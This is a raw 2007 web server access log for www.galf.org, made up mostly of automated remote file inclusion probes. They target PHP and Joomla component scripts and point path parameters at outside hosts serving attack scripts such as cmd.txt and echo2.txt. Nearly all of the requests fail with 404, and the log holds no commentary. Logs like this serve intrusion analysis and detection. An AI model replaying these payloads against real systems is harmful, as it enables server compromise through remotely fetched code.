217.72.251.90 - - [12/Aug/2007:19:29:23 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.94.32.54 - - [12/Aug/2007:19:31:45 -0700] "GET /logs/index.php?go=http://h1.ripway.com/r00tz/RFi.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.94.32.54 - - [12/Aug/2007:19:31:45 -0700] "GET /index.php?go=http://h1.ripway.com/r00tz/RFi.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:19:31:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:19:31:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.202.240.121 - - [12/Aug/2007:19:32:09 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.56.136.130 - - [12/Aug/2007:19:32:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.56.136.130 - - [12/Aug/2007:19:32:22 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.67.13.218 - - [12/Aug/2007:19:32:31 -0700] "GET /logs/access.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:33:56 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:33:56 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.151.228.18 - - [12/Aug/2007:19:34:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:34:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:34:20 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.216.253.180 - - [12/Aug/2007:19:35:10 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.253.180 - - [12/Aug/2007:19:35:10 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=uid=48(apache)%20gid=48(apache)%20groups=48(apache),500(webadmin),2522(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.211.196.5 - - [12/Aug/2007:19:36:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.211.196.5 - - [12/Aug/2007:19:36:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.219.165.110 - - [12/Aug/2007:19:36:34 -0700] "GET /modules/xfsection/modify.php?dir_module=http://mail.corous.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.148.104.7 - - [12/Aug/2007:19:36:38 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.148.104.7 - - [12/Aug/2007:19:36:38 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.249.65.51 - - [12/Aug/2007:19:37:32 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.249.65.51 - - [12/Aug/2007:19:37:32 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.249.65.51 - - [12/Aug/2007:19:37:34 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.249.65.51 - - [12/Aug/2007:19:37:34 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:19:38:10 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:19:39:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:40:30 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
209.249.65.51 - - [12/Aug/2007:19:41:49 -0700] "GET /logs/access.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.249.65.51 - - [12/Aug/2007:19:42:02 -0700] "GET /logs/access.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:42:35 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:42:35 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:42:35 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:42:36 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:42:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
193.34.17.169 - - [12/Aug/2007:19:42:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:42:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
209.249.65.51 - - [12/Aug/2007:19:42:46 -0700] "GET /logs/access_070723.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.43.204.181 - - [12/Aug/2007:19:44:29 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://frontierhotel.ie/site/cache/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:19:44:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
193.34.17.169 - - [12/Aug/2007:19:44:47 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
193.34.17.169 - - [12/Aug/2007:19:44:48 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:19:46:29 -0700] "GET /logs/access_070716.log/index1.php?dat=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:19:46:29 -0700] "GET /index1.php?dat=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:19:46:30 -0700] "GET /logs/index1.php?dat=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:19:47:07 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.67.153.151 - - [12/Aug/2007:19:47:17 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.67.153.151 - - [12/Aug/2007:19:47:17 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:19:48:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.44 - - [12/Aug/2007:19:48:38 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:19:49:14 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.43.69.32 - - [12/Aug/2007:19:50:43 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.co.uk/search?hl=en&q=lesbianas&btnG=Google+Search&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:19:50:45 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:19:51:37 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:19:51:40 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.215.194 - - [12/Aug/2007:19:52:28 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.142.215.194 - - [12/Aug/2007:19:52:29 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/cmd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:19:52:40 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:19:54:18 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.67.153.151 - - [12/Aug/2007:19:54:42 -0700] "GET /logs/access.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.191.172.5 - - [12/Aug/2007:19:54:56 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:55:14 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:19:55:14 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:19:56:24 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
202.67.153.151 - - [12/Aug/2007:19:56:40 -0700] "GET /logs/access_070723.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.30.250 - - [12/Aug/2007:19:56:54 -0700] "GET /logs/index.php?p=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.30.250 - - [12/Aug/2007:19:56:54 -0700] "GET /index.php?p=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:19:57:08 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.20.113.147 - - [12/Aug/2007:19:57:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:19:57:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.15.139.164 - - [12/Aug/2007:19:59:40 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:00:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:00:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:20:01:29 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.153.136.115 - - [12/Aug/2007:20:01:37 -0700] "GET /logs/access_070723.log/index1.php?dat=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:02:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:20:03:02 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.72.251.90 - - [12/Aug/2007:20:03:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:03:38 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:03:38 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:20:04:25 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.23.172 - - [12/Aug/2007:20:09:47 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.80.60.44 - - [12/Aug/2007:20:10:23 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:20:10:23 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.232.30.250 - - [12/Aug/2007:20:10:26 -0700] "GET /logs/index2.php?url_page=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.30.250 - - [12/Aug/2007:20:10:27 -0700] "GET /index2.php?url_page=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:20:11:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:20:11:30 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
194.186.55.214 - - [12/Aug/2007:20:14:08 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla" "www.galf.org"
66.249.84.10 - - [12/Aug/2007:20:14:22 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/2007030919 Firefox/2.0.0.3" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:14:22 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.22.2.74 - - [12/Aug/2007:20:15:16 -0700] "GET /logs/index.php?go=http://www.brunobieth.net/skieur/blogtrotter/share/gallery/themes/default/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
216.22.2.74 - - [12/Aug/2007:20:15:16 -0700] "GET /index.php?go=http://www.brunobieth.net/skieur/blogtrotter/share/gallery/themes/default/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.22.90.110 - - [12/Aug/2007:20:15:28 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [12/Aug/2007:20:15:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.20.113.147 - - [12/Aug/2007:20:18:03 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
217.20.113.147 - - [12/Aug/2007:20:18:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:18:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.151.69.2 - - [12/Aug/2007:20:20:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:22:48 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:23:10 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:23:59 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:23:59 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.151.228.18 - - [12/Aug/2007:20:25:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.151.69.2 - - [12/Aug/2007:20:26:39 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:27:57 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.193.237.43 - - [12/Aug/2007:20:28:20 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [12/Aug/2007:20:28:21 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:29:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.41 - - [12/Aug/2007:20:29:20 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.72.154.190 - - [12/Aug/2007:20:32:32 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.72.154.190 - - [12/Aug/2007:20:32:32 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://mildnet.by.ru/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.202.117 - - [12/Aug/2007:20:34:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.28.105 - - [12/Aug/2007:20:35:00 -0700] "GET /cendoc/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.80.60.44 - - [12/Aug/2007:20:35:31 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.44 - - [12/Aug/2007:20:35:31 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.80.60.41 - - [12/Aug/2007:20:37:26 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:37:26 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.191.51.220 - - [12/Aug/2007:20:37:33 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.191.51.220 - - [12/Aug/2007:20:37:33 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.l1nuxgroup.by.ru/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.151.228.18 - - [12/Aug/2007:20:38:01 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:38:11 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:38:36 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.10.199.229 - - [12/Aug/2007:20:38:42 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sslsystem.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.113.226.82 - - [12/Aug/2007:20:38:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.80.60.41 - - [12/Aug/2007:20:40:23 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://37889932.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
